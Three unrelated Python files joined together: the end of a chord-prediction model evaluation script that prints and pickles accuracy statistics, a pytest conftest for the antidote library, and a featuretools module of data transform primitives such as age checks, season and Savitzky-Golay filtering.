AnalyzerNoDiat.compare(chord = listChord[pred], target = listChord[tgt], key = listKey[dictDat["key"][i]], base_alpha = a5, print_comparison = False)
totalNoDiat += 1
dictKeyChordAll[listKey[dictDat["key"][i]]][tgt] += 1
if pred == tgt:
correctNoDiat += 1
# histogramm for each key on non diatonic target
dictKeyChord[listKey[dictDat["key"][i]]][tgt] += 1
nbCorrectChordNoDiat += 1
else:
AnalyzerDiat.compare(chord = listChord[pred], target = listChord[tgt], key = listKey[dictDat["key"][i]], base_alpha = a5, print_comparison = False)
totalDiat += 1
nbTotalDiat += 1
if pred == tgt:
correctDiat += 1
nbCorrectChordDiat += 1
if model == "mlpDecimAug" or model == "mlpDecimAugUp":
if dictDat["key"][i] == dictDat["keyPred"][i]:
keycorrect += 1
if dictDat["beat"][i] == dictDat["beatPred"][i]:
downbeatcorrect += 1
#sPrev, nby = perplexityAccumulate(dictDat["X"].tolist(), dictDat["y"].tolist(), sPrev, nby, True)
perp.append(perplexity(dictDat["X"].tolist(), dictDat["y"].tolist(), True))
totRank.append(np.mean(rank))
rank = []
acc = correct/total
keyacc = keycorrect/total
downbeatacc = downbeatcorrect/total
if alph != "functional":
accDiat = correctDiat/totalDiat
accNoDiat = correctNoDiat/totalNoDiat
accDownbeat = [int(b) / int(m) for b,m in zip(correctDown, totalDown)]
accPos = [int(b) / int(m) for b,m in zip(correctPos, totalPos)]
for i in range(len(totalBeatPos)):
accBeatPos[i] = [int(b) / int(m) for b,m in zip(correctBeatPos[i], totalBeatPos[i])]
totAcc.append(acc)
totAccDiat.append(accDiat)
totAccNoDiat.append(accNoDiat)
totKey.append(keyacc)
totDownbeat.append(downbeatacc)
if alph != "functional":
accFun = correctReducFunc/total
totAccFun.append(accFun)
if alph != "functional":
acca0 = correctReduca0/total
totAcca0.append(acca0)
'''
'''
totAcc2.append(acc2)
totAcc4.append(acc4)
totAccDownbeat.append(accDownbeat)
totAccPos.append(accPos)
totAccBeatPos.append(accBeatPos)
'''
'''
if alph != "functional":
totDist.append(musicalDist/total)
predTotDist.append(predMusicalDist/total)
'''
#Pinting time !
#perp = perplexityCompute(sPrev, nby)
"""
f = open("histo_output/" + model + "_" + alph + "_" + str(maxReps) + "histoChord.txt","w")
for key, value in dictKeyChord.items():
f.write("Histogramme on key : " + key + "\n")
for nBchord in range(len(value)):
f.write(listChord[nBchord] + ' = ' + str(value[nBchord])+ "\n")
f.write("\n\n")
f.close()
f = open("histo_output/" + model + "_" + alph + "_" + str(maxReps) + "histoChordAll.txt","w")
for key, value in dictKeyChordAll.items():
f.write("Histogramme on key : " + key + "\n")
for nBchord in range(len(value)):
f.write(listChord[nBchord] + ' = ' + str(value[nBchord])+ "\n")
f.write("\n\n")
f.close()
f = open("histo_output/" + model + "_" + alph + "_" + str(maxReps) + "histoChordRatio.txt","w")
for key, value in dictKeyChordAll.items():
f.write("Histogramme on key : " + key + "\n")
for nBchord in range(len(value)):
if value[nBchord] != 0:
f.write(listChord[nBchord] + ' = ' + str(dictKeyChord[key][nBchord]/value[nBchord])+ "\n")
f.write("\n\n")
f.close()
#save as pickle
f = open("histo_output/" + model + "_" + alph + "_" + str(maxReps) + "histoChord.pkl","wb")
pickle.dump(dictKeyChord,f)
f.close()
#save as pickle
f = open("histo_output/" + model + "_" + alph + "_" + str(maxReps) + "histoChordAll.pkl","wb")
pickle.dump(dictKeyChordAll,f)
f.close()
print("nbCorrectChordDiat :" + str(nbCorrectChordDiat))
print("nbCorrectChordNoDiat :" + str(nbCorrectChordNoDiat))
print("nbTotalDiat :" + str(nbTotalDiat))
print("nbTotalNoDiat :" + str(nbTotalNoDiat))
print("rank for " + model + " on alphabet " + alph + ": " + str(np.mean(totRank)))
print("perp for " + model + " on alphabet " + alph + ": " + str(np.mean(perp)))
print("acc for " + model + " on alphabet " + alph + ": " + str(np.mean(totAcc)))
print("accDiat for " + model + " on alphabet " + alph + ": " + str(np.mean(totAccDiat)))
print("accNoDiat for " + model + " on alphabet " + alph + ": " + str(np.mean(totAccNoDiat)))
if alph != "functional":
print("accFun for " + model + " on alphabet " + alph + ": " + str(np.mean(totAccFun)))
if alph != "functional" and alph != "a0":
print("acca0 for " + model + " on alphabet " + alph + ": " + str(np.mean(totAcca0)))
print("rank_std for " + model + " on alphabet " + alph + ": " + str(np.std(totRank)))
print("perp_std for " + model + " on alphabet " + alph + ": " + str(np.std(perp)))
print("acc_std for " + model + " on alphabet " + alph + ": " + str(np.std(totAcc)))
print("accDiat_std for " + model + " on alphabet " + alph + ": " + str(np.std(totAccDiat)))
print("accNoDiat_std for " + model + " on alphabet " + alph + ": " + str(np.std(totAccNoDiat)))
if alph != "functional":
print("accFun_std for " + model + " on alphabet " + alph + ": " + str(np.std(totAccFun)))
if alph != "functional" and alph != "a0":
print("acca0_std for " + model + " on alphabet " + alph + ": " + str(np.std(totAcca0)))
#print("acc2 for " + model + " on alphabet " + alph + ": " + str(np.mean(totAcc2)))
#print("acc4 for " + model + " on alphabet " + alph + ": " + str(np.mean(totAcc4)))
print("accDownbeat for " + model + " on alphabet " + alph + ": " + str(np.average(totAccDownbeat,axis=0)))
print("accPos for " + model + " on alphabet " + alph + ": " + str(np.average(totAccPos,axis=0)))
print("accBeatPos for " + model + " on alphabet " + alph + ": " + str(np.average(totAccBeatPos, axis = 0)))
"""
'''
if alph != "functional":
print("Average Musical Distance for " + model + " on alphabet " + alph + ": " + str(np.mean(totDist)))
print("Average Prediction Musical Distance for " + model + " on alphabet " + alph + ": " + str(np.mean(predTotDist)))
if model == "mlpDecimAug" or model == "mlpDecimAugUp":
print("accKey for " + model + " on alphabet " + alph + ": " + str(np.mean(totKey)))
print("accBeat for " + model + " on alphabet " + alph + ": " + str(np.mean(totDownbeat)))
print("accKey_std for " + model + " on alphabet " + alph + ": " + str(np.std(totKey)))
print("accBeat_std for " + model + " on alphabet " + alph + ": " + str(np.std(totDownbeat)))
'''
dictModel = {}
dictCurrent = {}
#basic info
#dictModel["numParam"] = dictDat["numParam"]
#dictModel["alpha"] = dictDat["alpha"]
#dictModel["modelType"] = dictDat["modelType"]
dictModel["key"] = np.mean(totKey)
dictModel["key_std"] = np.std(totKey)
dictModel["beat"] = np.mean(totDownbeat)
dictModel["beat_std"] = np.std(totDownbeat)
print("accKey for " + model + " on alphabet " + alph + ": " + str(np.mean(totKey)))
print("accBeat for " + model + " on alphabet " + alph + ": " + str(np.mean(totDownbeat)))
print("accKey_std for " + model + " on alphabet " + alph + ": " + str(np.std(totKey)))
print("accBeat_std for " + model + " on alphabet " + alph + ": " + str(np.std(totDownbeat)))
'''
dictModel["perp"] = np.mean(perp)
dictModel["acc"] = np.mean(totAcc)
dictModel["rank_std"] = np.std(totRank)
dictModel["perp_std"] = np.std(perp)
dictModel["acc_std"] = np.std(totAcc)
#diat info
dictModel["accDiat"] = np.mean(totAccDiat)
dictModel["accNoDiat"] = np.mean(totAccNoDiat)
dictModel["accDiat_std"] = np.std(totAccDiat)
dictModel["accNoDiat_std"] = np.std(totAccNoDiat)
#reductionInfo
if alph != "functional":
dictModel["accFun"] = np.mean(totAccFun)
dictModel["accFun_std"] = np.std(totAccFun)
if alph != "functional" and alph != "a0":
dictModel["acca0"] = np.mean(totAcca0)
dictModel["acca0_std"] = np.std(totAcca0)
#position info
dictModel["accDownbeat"] = np.average(totAccDownbeat,axis=0)
dictModel["accPos"] = np.average(totAccPos,axis=0)
dictModel["accBeatPos"] = np.average(totAccBeatPos, axis = 0)
#Key beat info
if model == "mlpDecimAug" or model == "mlpDecimAugUp":
dictModel["accKey"] = np.mean(totKey)
dictModel["accBeat"] = np.mean(totDownbeat)
dictModel["accKey_std"] = np.std(totKey)
dictModel["accBeat_std"] = np.std(totDownbeat)
if alph != "functional":
dictModel["MusicalDist"] = np.mean(totDist)
dictModel["PredMusicalDist"] = np.mean(predTotDist)
dictACE_stats = {}
dictACE_degs = {}
for anal, anal_name in zip([Analyzer, AnalyzerDiat, AnalyzerNoDiat],['all chords', 'diatonic target', 'non-diatonic target']):
dictACE_stats_cur = {}
dictACE_degs_cur = {}
print("\n------\nSTATS for chord present in :" + anal_name+ "\n------")
StatsErrorsSubstitutions = anal.stats_errors_substitutions(stats_on_errors_only = True)
print("\nSTATS ERROR SUBSTITUTIONS:\n------")
print("Errors explained by substitutions rules: {}% of total errors\n------".format(round(anal.total_errors_explained_by_substitutions*100.0/anal.total_errors,2)))
print("DETAIL ERRORS EXPLAINED BY SUBSTITUTION RULES:")
for error_type, stat in StatsErrorsSubstitutions.items():
#if stat*100 > 1:
dictACE_stats_cur[error_type] = stat
if stat*100 > 1:
print("{}: {}%".format(error_type, round(100*stat, 2)))
# print(Analyzer.total_errors_degrees)
# print(Analyzer.total_errors_when_non_diatonic_target)
# print(Analyzer.total_non_diatonic_target)
# print(Analyzer.degrees_analysis)
StatsErrorsDegrees = anal.stats_errors_degrees(stats_on_errors_only = True)
print("\nSTATS ERROR DEGREES:\n------")
if anal_name != "diatonic target":
print("Errors when the target is not diatonic: {}% ".format(round(anal.total_errors_when_non_diatonic_target*100.0/anal.total_non_diatonic_target,2)))
print("Non diatonic target in {}% of the total errors".format(round(anal.total_errors_when_non_diatonic_target*100.0/anal.total_errors,2)))
print("When relevant: incorrect degrees (modulo inclusions): {}% of total errors\n------".format(round(anal.total_errors_degrees*100.0/anal.total_errors,2)))
print("DETAIL ERRORS OF DEGREES (modulo inclusions) WHEN THE TARGET IS DIATONIC:")
for error_type, stat in StatsErrorsDegrees.items():
#if stat*100 > 1:
dictACE_degs_cur[error_type] = stat
if stat*100 > 1:
print("{}: {}%".format(error_type, round(100*stat,2)))
dictACE_stats[anal_name] = dictACE_stats_cur
dictACE_degs[anal_name] = dictACE_degs_cur
#dictModel["MusicalDist2a"] = np.mean(totDist2a)
#dictModel["MusicalDist4a"] = np.mean(totDist4a)
#dictModel["MusicalDist2b"] = np.mean(totDist2b)
#dictModel["MusicalDist4b"] = np.mean(totDist4b)
#dictModel["MusicalDist2c"] = np.mean(totDist2c)
#dictModel["MusicalDist4c"] = np.mean(totDist4c)
#dictFinalRes[model + "_" + alph] = dictModel
dictCurrent["res"] = dictModel
dictCurrent["stats"] = dictACE_stats
dictCurrent["degs"] = dictACE_degs
dictFinalRes[model + "_" + alph + "_" + str(maxReps)] = dictCurrent
print("\n\n")
'''
dictCurrent["res"] = dictModel
dictFinalRes[model + "_" + alph + "_" + str(maxReps)] = dictCurrent
#dictFinalRes = dictFinalRes.cpu()
sauv = open(foldName + "_DictFinaltest_keyBeat.pkl","wb")
pickle.dump(dictFinalRes,sauv)
sauv.close()
print("analyses completed")
#%%
|
import pytest
from antidote import config, is_compiled
config.auto_detect_type_hints_locals = True
def pytest_runtest_setup(item):
if any(mark.name == "compiled_only" for mark in item.iter_markers()):
if not is_compiled():
pytest.skip("Compiled only test.")
|
from collections import deque
from featuretools.variable_types.variable import Discrete
import warnings
import numpy as np
import string
import pandas
import re
import math
from datetime import datetime, timedelta
from pyzipcode import ZipCodeDatabase
from pandas import Series
from scipy.signal import savgol_filter
from scipy.stats import stats
from phone_iso3166.country import phone_country
from nltk.corpus import stopwords
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from featuretools.primitives.base.transform_primitive_base import (
TransformPrimitive
)
from featuretools.utils import convert_time_units
from featuretools.utils.entity_utils import replace_latlong_nan
from featuretools.utils.gen_utils import Library
from featuretools.variable_types import (
Boolean,
Categorical,
DateOfBirth,
Datetime,
DatetimeTimeIndex,
LatLong,
NaturalLanguage,
Numeric,
Ordinal,
PhoneNumber,
SubRegionCode,
URL,
Variable,
ZIPCode
)
class AbsoluteDiff(TransformPrimitive):
"""Computes the absolute diff of a number.
Examples:
>>> absdiff = AbsoluteDiff()
>>> absdiff([3.0, -5.0, -2.4]).tolist()
[nan, 8.0, 2.6]
"""
name = "absolute_diff"
input_types = [Numeric]
return_type = Numeric
compatibility = [Library.PANDAS, Library.DASK, Library.KOALAS]
description_template = "the absolute diff of {}"
def get_function(self):
def func_absdiff(values):
return np.absolute(np.diff(values, prepend=float('nan')))
return func_absdiff
class AgeOverN(TransformPrimitive):
input_types = [DateOfBirth]
return_type = Boolean
uses_calc_time = True
compatibility = [Library.PANDAS, Library.DASK]
def get_function_helper(self, overN):
def age(x, time=None):
return (time - x).dt.days / 365 > overN
return age
class AgeOver18(AgeOverN):
"""Determines whether a person is over 18 years old given their date of birth.
Description:
Returns True if the person's age is greater than or equal to 18 years.
Returns False if the age is less than 18 years of age.
Returns nan if the age is not defined or doesn't exist..
Examples:
Determine whether someone born on Jan 1, 2000 is over 18 years old as of January 1, 2019.
>>> import pandas as pd
>>> reference_date = pd.to_datetime("01-01-2019")
>>> age_over_18 = AgeOver18()
>>> input_ages = [pd.to_datetime("01-01-2000"), pd.to_datetime("06-01-2010")]
>>> age_over_18(input_ages, time=reference_date).tolist()
[True, False]
"""
name = "age_over_18"
description_template = "the age over 18 from {}"
def get_function(self):
return AgeOverN.get_function_helper(self, 18)
class AgeOver25(AgeOverN):
"""Determines whether a person is over 25 years old given their date of birth.
Description:
Returns True if the person's age is greater than or equal to 25 years.
Returns False if the age is less than 25 years of age.
Returns nan if the age is not defined or doesn't exist..
Examples:
Determine whether someone born on Jan 1, 2000 is over 25 years old as of January 1, 2019.
>>> import pandas as pd
>>> reference_date = pd.to_datetime("01-01-2019")
>>> age_over_25 = AgeOver25()
>>> input_ages = [pd.to_datetime("01-01-2000"), pd.to_datetime("06-01-1990")]
>>> age_over_25(input_ages, time=reference_date).tolist()
[False, True]
"""
name = "age_over_25"
description_template = "the age over 25 from {}"
def get_function(self):
return AgeOverN.get_function_helper(self, 25)
class AgeOver65(AgeOverN):
"""Determines whether a person is over 65 years old given their date of birth.
Description:
Returns True if the person's age is greater than or equal to 65 years.
Returns False if the age is less than 65 years of age.
Returns nan if the age is not defined or doesn't exist..
Examples:
Determine whether someone born on Jan 1, 1950 is over 65 years old as of January 1, 2019.
>>> import pandas as pd
>>> reference_date = pd.to_datetime("01-01-2019")
>>> age_over_65 = AgeOver65()
>>> input_ages = [pd.to_datetime("01-01-1950"), pd.to_datetime("01-01-2000")]
>>> age_over_65(input_ages, time=reference_date).tolist()
[True, False]
"""
name = "age_over_65"
description_template = "the age over 65 from {}"
def get_function(self):
return AgeOverN.get_function_helper(self, 65)
class AgeUnderN(TransformPrimitive):
input_types = [DateOfBirth]
return_type = Boolean
uses_calc_time = True
compatibility = [Library.PANDAS, Library.DASK]
description_template = "the age under 18 from {}"
def get_function_helper(self, underN):
def age(x, time=None):
return (time - x).dt.days / 365 < underN
return age
class AgeUnder18(AgeUnderN):
"""Determines whether a person is under 18 years old given their date of birth.
Description:
Returns True if the person's age is less than 18 years.
Returns False if the age is more than or equal to 18 years.
Returns np.nan if the age is not defined, or doesn't exist.
Examples:
Determine whether someone born on Jan 1, 2000 is under 18 years old as of January 1, 2019.
>>>> import pandas as pd
>>> reference_date = pd.to_datetime("01-01-2019")
>>> age_under_18 = AgeUnder18()
>>> input_ages = [pd.to_datetime("01-01-2000"), pd.to_datetime("06-01-2010")]
>>> age_under_18(input_ages, time=reference_date).tolist()
[False, True]
"""
name = "age_under_18"
description_template = "the age under 18 from {}"
def get_function(self):
return AgeUnderN.get_function_helper(self, 18)
class AgeUnder65(AgeUnderN):
"""Determines whether a person is under 65 years old given their date of birth.
Description:
Returns True if the person's age is less than 65 years.
Returns False if the age is more than or equal to 65 years.
Returns np.nan if the age is not defined, or doesn't exist.
Examples:
Determine whether two people are under age 65 as of January 1, 2019.
>>> import pandas as pd
>>> reference_date = pd.to_datetime("01-01-2019")
>>> age_under_65 = AgeUnder65()
>>> input_ages = [pd.to_datetime("01-01-1950"),
... pd.to_datetime("06-01-2010")]
>>> age_under_65(input_ages, time=reference_date).tolist()
[False, True]
"""
name = "age_under_65"
description_template = "the age under 65 from {}"
def get_function(self):
return AgeUnderN.get_function_helper(self, 65)
class NaturalLanguageToYear(TransformPrimitive):
"""Extracts the year from a string
Description:
If a year is present in a string, extract the year.
This will only match years between 1800 and 2199.
Years will not be extracted if immediately preceeded or followed by another number or letter.
If there are multiple years present in a string, only the first year will be returned.
Examples:
>>> text_to_year = NaturalLanguageToYear()
>>> array = pd.Series(["The year was 1887.",
... "This string has no year",
... "Toy Story (1995)",
... "12451997abc"])
>>> text_to_year(array).tolist()
['1887', nan, '1995', nan]
"""
name = "natural_language_to_year"
input_types = [NaturalLanguage]
return_type = Ordinal
description_template = "the year from {}"
def get_function(self):
def lang_to_year(values):
result = []
for value in values:
numbers = re.findall('\d+', value)
find = False
for number in numbers:
if 1800 <= int(number) < 2200:
result.append(int(number))
find = True
break
if not find:
result.append(np.nan)
return np.array(result)
return lang_to_year
class NthWeekOfMonth(TransformPrimitive):
"""Determines the nth week of the month from a given date.
Description:
Converts a datetime to an float representing the week of the month in which the date falls.
The first day of the month starts week 1, and the week number is incremented each Sunday.
Examples:
>>> from datetime import datetime
>>> nth_week_of_month = NthWeekOfMonth()
>>> times = [datetime(2019, 3, 1),
... datetime(2019, 3, 3),
... datetime(2019, 3, 31),
... datetime(2019, 3, 30)]
>>> nth_week_of_month(times).tolist()
[1.0, 2.0, 6.0, 5.0]
"""
name = "nth_week_of_month"
input_types = [Datetime]
return_type = Numeric
description_template = "the nth week of the month from {}"
def get_function(self):
def nth_week(dates):
result = []
for date in dates:
first_day = date.replace(day=1)
if first_day.weekday() < 6:
first_day = first_day - timedelta(days=first_day.weekday()+1)
result.append((date - first_day).days // 7 + 1)
return np.array(result)
return nth_week
class PartOfDay(TransformPrimitive):
"""Determines what part of the day a particular time value falls in.
Description:
Given a list of datetimes, determine part of day based on the hour.
The options are: Morning (5am-11am), Afternoon (12pm-5pm), Evening (6pm-9pm), or Night (10pm-4am).
If the date is missing, return `NaN`.
Examples:
>>> from datetime import datetime
>>> part_of_day = PartOfDay()
>>> times = [datetime(2010, 1, 1, 1, 45, 0),
... datetime(2010, 1, 1, 8, 55, 15),
... datetime(2010, 1, 1, 16, 55, 15),
... datetime(2010, 1, 1, 23, 57, 30)]
>>> part_of_day(times).tolist()
['Night', 'Morning', 'Afternoon', 'Night']
"""
name = "part_of_day"
input_types = [Datetime]
return_type = Categorical
description_template = "what part of the day {} falls in"
def get_function(self):
def part_of_day(values):
result = []
for value in values:
hour = value.hour
if 5 <= hour <= 11:
result.append('Morning')
elif 12 <= hour <= 17:
result.append('Afternoon')
elif 18 <= hour <= 21:
result.append('Evening')
else:
result.append('Night')
return np.array(result)
return part_of_day
class PercentChange(TransformPrimitive):
"""Determines the percent difference between values in a list.
Description:
Given a list of numbers, return the percent difference between each subsequent number.
Percentages are shown in decimal form (not multiplied by 100).
Args:
periods (int) : Periods to shift for calculating percent change.
Default is 1.
fill_method (str) : Method for filling gaps in reindexed Series.
Valid options are `backfill`, `bfill`, `pad`, `ffill`.
`pad / ffill`: fill gap with last valid observation.
`backfill / bfill`: fill gap with next valid observation.
Default is `pad`.
limit (int) : The max number of consecutive NaN values in a gap that can be filled.
Default is None.
freq (DateOffset, timedelta, or str) : Instead of calcualting change between subsequent points, PercentChange will calculate change between points with a certain interval between their date indices.
`freq` defines the desired interval.
When freq is used, the resulting index will also be filled to include any missing dates from the specified interval.
If the index is not date/datetime and freq is used, it will raise a NotImplementedError.
If freq is None, no changes will be applied.
Default is None
Examples:
>>> percent_change = PercentChange()
>>> percent_change([2, 5, 15, 3, 3, 9, 4.5]).to_list()
[nan, 1.5, 2.0, -0.8, 0.0, 2.0, -0.5]
We can control the number of periods to return the percent difference between points further from one another.
>>> percent_change_2 = PercentChange(periods=2)
>>> percent_change_2([2, 5, 15, 3, 3, 9, 4.5]).to_list()
[nan, nan, 6.5, -0.4, -0.8, 2.0, 0.5]
We can control the method used to handle gaps in data.
>>> percent_change = PercentChange()
>>> percent_change([2, 4, 8, None, 16, None, 32, None]).to_list()
[nan, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0]
>>> percent_change_backfill = PercentChange(fill_method='backfill')
>>> percent_change_backfill([2, 4, 8, None, 16, None, 32, None]).to_list()
[nan, 1.0, 1.0, 1.0, 0.0, 1.0, 0.0, nan]
We can control the maximum number of NaN values to fill in a gap.
>>> percent_change = PercentChange()
>>> percent_change([2, None, None, None, 4]).to_list()
[nan, 0.0, 0.0, 0.0, 1.0]
>>> percent_change_limited = PercentChange(limit=2)
>>> percent_change_limited([2, None, None, None, 4]).to_list()
[nan, 0.0, 0.0, nan, nan]
We can specify a date frequency on which to calculate percent change.
>>> import pandas as pd
>>> dates = pd.DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-05'])
>>> x_indexed = pd.Series([1, 2, 3, 4], index=dates)
>>> percent_change = PercentChange()
>>> percent_change(x_indexed).to_list()
[nan, 1.0, 0.5, 0.33333333333333326]
>>> date_offset = pd.tseries.offsets.DateOffset(1)
>>> percent_change_freq = PercentChange(freq=date_offset)
>>> percent_change_freq(x_indexed).to_list()
[nan, 1.0, 0.5, nan]
"""
name = "percent_change"
input_types = [Numeric]
return_type = Numeric
description_template = "the percent difference between values in {}"
def __init__(self, periods=1, fill_method='pad', limit=None, freq=None):
self.periods = periods
self.fill_method = fill_method
self.limit = limit
self.freq = freq
def get_function(self):
def pct_change(values):
return values.pct_change(periods=self.periods, fill_method=self.fill_method, limit=self.limit, freq=self.freq)
return pct_change
class PhoneNumberToCountry(TransformPrimitive):
"""Determines the country of a phone number.
Description:
Given a list of phone numbers, return the country of each one, based on the country code.
If a phone number is missing or invalid, return np.nan.
Examples:
>>> phone_number_to_country = PhoneNumberToCountry()
>>> phone_number_to_country(['+55 85 5555555', '+81 55-555-5555', '+1-541-754-3010',]).tolist()
['BR', 'JP', 'US']
"""
name = "phone_number_to_country"
input_types = [PhoneNumber]
return_type = Categorical
description_template = "the country of {}"
def get_function(self):
def phone_to_country(values):
result = []
for value in values:
result.append(phone_country(value))
return np.array(result)
return phone_to_country
class PolarityScore(TransformPrimitive):
"""Calculates the polarity of a text on a scale from -1 (negative) to 1 (positive)
Description:
Given a list of strings assign a polarity score from -1 (negative text), to 0 (neutral text), to 1 (positive text).
The function returns a score for every given piece of text.
If a string is missing, return 'NaN'
Examples:
>>> x = ['He loves dogs', 'She hates cats', 'There is a dog', '']
>>> polarity_score = PolarityScore()
>>> polarity_score(x).tolist()
[0.677, -0.649, 0.0, 0.0]
"""
name = "polarity_score"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the polarity of {} on a scale from -1 to 1"
def get_function(self):
def polarity_score(values):
result = []
analyazer = SentimentIntensityAnalyzer()
for value in values:
result.append(analyazer.polarity_scores(value)['compound'])
return np.array(result)
return polarity_score
class PunctuationCount(TransformPrimitive):
"""Determines number of punctuation characters in a string.
Description:
Given list of strings, determine the number of punctuation characters in each string.
Looks for any of the following: !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
Examples:
>>> x = ['This is a test file.', 'This is second line', 'third line: $1,000']
>>> punctuation_count = PunctuationCount()
>>> punctuation_count(x).tolist()
[1.0, 0.0, 3.0]
"""
name = "punctuation_count"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the number of punctuation characters in {}"
def get_function(self):
def punc_cnt(values):
result = []
for value in values:
cnt = 0
for punc in string.punctuation:
if punc in value:
cnt += 1
result.append(cnt)
return np.array(result)
return punc_cnt
class Quarter(TransformPrimitive):
"""Determines the quarter of the year of a datetime
Examples:
>>> import pandas as pd
>>> quarter = Quarter()
>>> quarter([pd.to_datetime('2018-02-28'),
... pd.to_datetime('2018-08-15'),
... pd.to_datetime('2018-12-31'),
... pd.to_datetime('2018-05-01')]).tolist()
[1, 3, 4, 2]
"""
name = "quarter"
input_types = [Datetime]
return_type = Ordinal
description_template = "the quarter of the year of {}"
def get_function(self):
def quarter(values):
result = []
for value in values:
month = value.month
if 1 <= month <= 3:
result.append(1)
elif 4 <= month <= 6:
result.append(2)
elif 7 <= month <= 9:
result.append(3)
else:
result.append(4)
return np.array(result)
return quarter
class SameAsPrevious(TransformPrimitive):
"""Determines if a value is equal to the previous value in a list.
Description:
Compares a value in a list to the previous value and returns True if the value is equal to the previous value or False otherwise.
The first item in the output will always be False, since there is no previous element for the first element comparison.
Any nan values in the input will be filled using either a forward-fill or backward-fill method, specified by the fill_method argument.
The number of consecutive nan values that get filled can be limited with the limit argument.
Any nan values left after filling will result in False being returned for any comparison involving the nan value.
Args:
fill_method (str) : Method for filling gaps in series.
Validoptions are `backfill`, `bfill`, `pad`, `ffill`.
`pad / ffill`: fill gap with last valid observation.
`backfill / bfill`: fill gap with next valid observation.
Default is `pad`.
limit (int) : The max number of consecutive NaN values in a gap that can be filled.
Default is None.
Examples:
>>> same_as_previous = SameAsPrevious()
>>> same_as_previous([1, 2, 2, 4]).tolist()
[False, False, True, False]
The fill method for nan values can be specified
>>> same_as_previous_fillna = SameAsPrevious(fill_method="bfill")
>>> same_as_previous_fillna([1, None, 2, 4]).tolist()
[False, False, True, False]
The number of nan values that are filled can be limited
>>> same_as_previous_limitfill = SameAsPrevious(limit=2)
>>> same_as_previous_limitfill([1, None, None, None, 2, 3]).tolist()
[False, True, True, False, False, False]
"""
name = "same_as_previous"
input_types = [Numeric]
return_type = Numeric
description_template = "determines if a value is equal to the previous value in {}"
def __init__(self, fill_method='pad', limit=None):
self.fill_method = fill_method
self.limit = limit
def get_function(self):
def same_as_pre(values):
fill_values = values.fillna(method=self.fill_method, limit=self.limit)
result = [False]
if type(fill_values) is Series:
fill_values = fill_values.tolist()
for i in range(1, len(fill_values)):
if fill_values[i-1] == fill_values[i]:
result.append(True)
else:
result.append(False)
return np.array(result)
return same_as_pre
class SavgolFilter(TransformPrimitive):
"""Applies a Savitzky-Golay filter to a list of values.
Description:
Given a list of values, return a smoothed list which increases the signal to noise ratio without greatly distoring the signal.
Uses the `Savitzky–Golay filter` method.
If the input list has less than 20 values, it will be returned as is.
Args:
window_length (int) : The length of the filter window (i.e. the numberof coefficients).
`window_length` must be a positive odd integer.
polyorder (int) : The order of the polynomial used to fit the samples.
`polyorder` must be less than `window_length`.
deriv (int) : Optional. The order of the derivative to compute.
This must be a nonnegative integer.
The default is 0, which means to filter the data without differentiating.
delta (float) : Optional. The spacing of the samples to which the filter will be applied.
This is only used if deriv > 0. Default is 1.0.
mode (str) : Optional. Must be 'mirror', 'constant', 'nearest', 'wrap' or 'interp'.
This determines the type of extension to use for the padded signal to which the filter is applied.
When `mode` is 'constant', the padding value is given by `cval`.
See the Notes for more details on 'mirror', 'constant', 'wrap', and 'nearest'.
When the 'interp' mode is selected (the default), no extensionis used.
Instead, a degree `polyorder` polynomial is fit to the last `window_length` values of the edges, and this polynomial is used to evaluate the last `window_length // 2` output values.
cval (scalar) : Optional. Value to fill past the edges of the input if `mode` is 'constant'.
Default is 0.0.
Examples:
>>> savgol_filter = SavgolFilter()
>>> data = [0, 1, 1, 2, 3, 4, 5, 7, 8, 7, 9, 9, 12, 11, 12, 14, 15, 17, 17, 17, 20]
>>> [round(x, 4) for x in savgol_filter(data).tolist()[:3]]
[0.0429, 0.8286, 1.2571]
We can control `window_length` and `polyorder` of the filter.
>>> savgol_filter = SavgolFilter(window_length=13, polyorder=3)
>>> [round(x, 4) for x in savgol_filter(data).tolist()[:3]]
[-0.0962, 0.6484, 1.4451]
We can control the `deriv` and `delta` parameters.
>>> savgol_filter = SavgolFilter(deriv=1, delta=1.5)
>>> [round(x, 4) for x in savgol_filter(data).tolist()[:3]]
[0.754, 0.3492, 0.2778]
We can use `mode` to control how edge values are handled.
>>> savgol_filter = SavgolFilter(mode='constant', cval=5)
>>> [round(x, 4) for x in savgol_filter(data).tolist()[:3]]
[1.5429, 0.2286, 1.2571]
"""
name = "savgol_filter"
input_types = [Numeric]
return_type = Numeric
description_template = "Applying Savitzky-Golay filter to {}"
def __init__(self, window_length=5, polyorder=3, deriv=0, delta=1.0, axis=-1, mode='interp', cval=0.0):
self.window_length = window_length
self.polyorder = polyorder
self.deriv = deriv
self.delta = delta
self.axis = axis
self.mode = mode
self.cval = cval
def get_function(self):
def sav_filter(values):
if self.mode == "interp" and self.window_length > len(values):
self.window_length = len(values)
if self.window_length % 2 == 0:
self.window_length -= 1
self.polyorder = self.window_length // 2
return savgol_filter(values, self.window_length, self.polyorder, self.deriv, self.delta, self.axis, self.mode, self.cval)
return sav_filter
class ScorePercentile(TransformPrimitive):
"""Determines the percentile of each value against an array of scores.
Description:
Given a list of numbers, return the approximate percentile of each number compared to a given array of scores.
Args:
scores (array) : Array of values to which our input values are compared.
Examples:
>>> percentile = ScorePercentile(scores=list(range(1, 11)))
>>> percentile([1, 5, 10, 11, 0]).tolist()
[10.0, 50.0, 100.0, 100.0, 0.0]
"""
name = "score_percentile"
input_types = [Numeric]
return_type = Numeric
description_template = "the percentile of {} against scores"
def __init__(self, scores=[]):
self.scores = scores
def get_function(self):
def score_percent(values):
if len(self.scores) == 0:
self.scores = values
return np.array([stats.percentileofscore(self.scores, value) for value in values])
return score_percent
class Season(TransformPrimitive):
"""Determines the season of a given datetime.
Description:
Given a list of datetimes, return the season of each one (`winter`, `spring`, `summer`, or `fall`).
Uses the month of the datetime to determine the season.
Args:
hemisphere (str) : Specify northern or southern hemisphere.
Could be 'northern' or 'north' or 'southern' or 'south'.
Default is 'northern'.
Examples:
>>> from datetime import datetime
>>> times = [datetime(2019, 1, 1),
... datetime(2019, 3, 15),
... datetime(2019, 7, 20),
... datetime(2019, 12, 30)]
>>> season = Season()
>>> season(times).tolist()
['winter', 'spring', 'summer', 'winter']
We can specify the hemisphere as well.
>>> from datetime import datetime
>>> season_southern = Season(hemisphere='southern')
>>> season_southern(times).tolist()
['summer', 'fall', 'winter', 'summer']
"""
name = "season"
